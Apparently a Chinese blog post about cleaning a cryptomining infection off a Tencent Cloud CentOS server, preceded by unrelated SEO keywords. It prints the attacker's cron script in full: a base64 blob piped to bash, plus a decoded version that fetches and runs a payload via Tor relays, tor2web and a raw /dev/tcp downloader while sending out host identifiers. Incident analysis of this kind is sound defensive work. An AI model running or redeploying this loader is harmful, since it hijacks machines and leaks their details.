网站怎么做流量互换,网站设计psd模板,公司网站建设完成通知,潮阳发布最新通告早上8点左右收到腾讯云的相关短信#xff0c;提示机器可能存在挖坑风险。马上登录机器看了一下#xff0c;发现crontab有个比较诡异的任务
[devVM_0_12_centos ~]$ crontab -l
11 * * * * /home/dev/.config/systemd/user/systemd-tmpfiles-cleanup/systemd-tmpfiles-cleanu…早上8点左右收到腾讯云的相关短信提示机器可能存在挖坑风险。马上登录机器看了一下发现crontab有个比较诡异的任务
[devVM_0_12_centos ~]$ crontab -l
11 * * * * /home/dev/.config/systemd/user/systemd-tmpfiles-cleanup/systemd-tmpfiles-cleanup-z3glwn.sh /dev/null 21 [devVM_0_12_centos ~]$ cd .config/
[devVM_0_12_centos .config]$ ll
total 20
drwxrwxr-x 5 dev dev 4096 Jun 20 06:08 .
drwx------ 15 dev dev 4096 Jun 8 19:55 ..
drwxrwxr-x 2 dev dev 4096 Apr 30 2020 abrt
drwxrwxr-x 2 dev dev 4096 May 27 2020 jgit
drwxrwxr-x 3 dev dev 4096 Jun 20 06:08 systemd 这个时间点不正常腾讯云8点发的短信然后去找这个任务看了一下具体执行的内容
[devVM_0_12_centos systemd-tmpfiles-cleanup]$ cat systemd-tmpfiles-cleanup-z3glwn.sh
#!/bin/bash
exec /dev/null
echo z3glwn
echo ejNnbHduCmV4ZWMgJj4vZGV2L251bGwKQkRyRll6V2c9Li8uJChkYXRlfG1kNXN1bXxoZWFkIC1jMjApCnF5eW52cEJRPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCnNOSG91WWp4PSIvdG1wL3N5c3RlbWQtcHJpdmF0ZS1hZTc3NjIwNjQyMmU4ODY5NjFlZWZiMzU4YzRmZWZkYS1zeXN0ZW1kLWxvZ2luZC5zZXJ2aWNlLXozZ2x3biIKR1JQb05UeEQ9ImN1cmwgLW02MCAtZnNTTGtBLSAtLWRvaC11cmwgaHR0cHM6Ly8ke3F5eW52cEJRWyQoKFJBTkRPTSUkeyNxeXludnBCUVtAXX0pKV19L2Rucy1xdWVyeSIKWndKdEdRYUM9ImN1cmwgLW02MCAtZnNTTGtBLSIKSE5QRHNtd3o9InJlbGF5LnRvcjJzb2Nrcy5pbiIKSHlNYnZoTnE9InJ1NnI0aW5rYWY0dGhsZ2ZsZzRpcXM1bWhxd3F1Ym9sczVxYWdzcHZ5YTR3aHAzZGdidm15aGFkIgpQQVRIPS90bXA6JHNOSG91WWp4OiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbjokUEFUSAoKZUdpQXNvbVgoKSB7CglyZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCglET0M9LyR7cGF0aC8vIC8vfQoJSE9TVD0ke3NlcnZlci8vOip9CglQT1JUPSR7c2VydmVyLy8qOn0KCVtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCglleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKCWVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcblVzZXItQWdlbnQ6IC1cclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiAJjMKCSh3aGlsZSByZWFkIGxpbmU7IGRvCglbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCglkb25lICYmIGNhdCkgPCYzCglleGVjIDMJi0KfQoKYkNRWWhBclYoKSB7Cglmb3IgaSBpbiAkc05Ib3VZanggLiAvdXNyL2JpbiAvdmFyL3RtcCAvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9CgpYTlNCallPTygpIHsKCUhvVkNRSEZ1PS9leGVjCglMb3VNUUVjaz1jcjBfJChjdXJsIC1zNCBpZGVudC5tZXx8Y3VybCAtNCBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW4pXyQodW5hbWUgLXIpXyQoY2F0IC9ldGMvbWFjaGluZS1pZHx8KGlwIHJ8fGhvc3RuYW1lIC1pfHxlY2hvIG5vLWlkKXxtZDVzdW18YXdrIE5GPTEpCgkkR1JQb05UeEQgLXggc29ja3M1aDovLyRITlBEc213ejo5MDUwIC1lJExvdU1RRWNrICRIeU1idmhOcS5vbmlvbiRIb1ZDUUhGdSAtbyRCRHJGWXpXZyB8fCAkR1JQb05UeEQgLWUkTG91TVFFY2sgJDEkSG9WQ1FIRnUgLW8kQkRyRll6V2cgfHwgJFp3SnRHUWFDIC14IHNvY2tzNWg6Ly8kSE5QRHNtd3o6OTA1MCAtZSRMb3VNUUVjayAkSHlNYnZoTnEub25pb24kSG9WQ1FIRnUgLW8kQkRyRll6V2cgfHwgJFp3SnRHUWFDIC1lJExvdU1RRWNrICQxJEhvVkNRSEZ1IC1vJEJEckZZeldnCn0KCk1QUUthbkRnKCkgewoJY2htb2QgK3ggJEJEckZZeldnOyRCRHJGWXpXZztybSAtZiAkQkRyRll6V2cKfQoKZHRPRkNBdFQoKSB7Cgl1PSRIeU1idmhOcS50b3Iyd2ViLml0L2xvYWQvCgljZCAvdG1wICYmIGN1cmwgLVYgfHwgKGVHaUFzb21YIGh0dHA6Ly8kdS9jdSkgfCB0YXIgenhwCgliQ1FZaEFyVgoJWE5TQmpZT08gJEh5TWJ2aE5xLnRvcjJ3ZWIuaXQgfHwKCVhOU0JqWU9PICRIeU1idmhOcS50b3Iyd2ViLmluIHx8CglYTlNCallPTyAkSHlNYnZoTnEudG9yMndlYi5yZQoJTVBRS2FuRGcKfQoKbHMgL3Byb2MvJChoZWFkIC0xIC90bXAvLnN5c3RlbWQuMSkvbWFwcyB8fCBkdE9GQ0F0VAo|base64 -d|bash将上面的echo内容通过base64转码可以得到如下内容
z3glwn
exec /dev/null
BDrFYzWg./.$(date|md5sum|head -c20)
qyynvpBQ(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
sNHouYjx/tmp/systemd-private-ae776206422e886961eefb358c4fefda-systemd-logind.service-z3glwn
GRPoNTxDcurl -m60 -fsSLkA- --doh-url https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[]}))]}/dns-query
ZwJtGQaCcurl -m60 -fsSLkA-
HNPDsmwzrelay.tor2socks.in
HyMbvhNqru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad
PATH/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATHeGiAsomX() {read proto server path $(echo ${1 })DOC/${path// //}HOST${server//:*}PORT${server//*:}[[ x${HOST} x${PORT} ]] PORT80exec 3/dev/tcp/${HOST}/$PORTecho -en GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n 3(while read line; do[[ $line $\r ]] breakdone cat) 3exec 3-
}bCQYhArV() {for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit $i/i chmod x $i/i cd $i ./i rm -f i break;done
}XNSBjYOO() {HoVCQHFu/execLouMQEckcr0_$(curl -s4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF1)$GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
}MPQKanDg() {chmod x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
}dtOFCAtT() {u$HyMbvhNq.tor2web.it/load/cd /tmp curl -V || (eGiAsomX http://$u/cu) | tar zxpbCQYhArVXNSBjYOO $HyMbvhNq.tor2web.it ||XNSBjYOO $HyMbvhNq.tor2web.in ||XNSBjYOO $HyMbvhNq.tor2web.reMPQKanDg
}ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT
没有仔细排查首先就是停止任务执行但是后面发现这个crontab任务又启动了基于pid可以找到把这个一并停止了
[devVM_0_12_centos .config]$ ps -ef | grep 6QTAv88
dev 1996782 1 0 06:06 ? 00:00:00 6QTAv88
dev 2069016 2063681 0 09:55 pts/3 00:00:00 grep --colorauto 6QTAv88当前dev用户启动的只有rocketmq、esredis为root可以排除。可以定位到大致是es控制台的脚本执行漏洞 http://www.hzhcontrols.com/new-569680.html
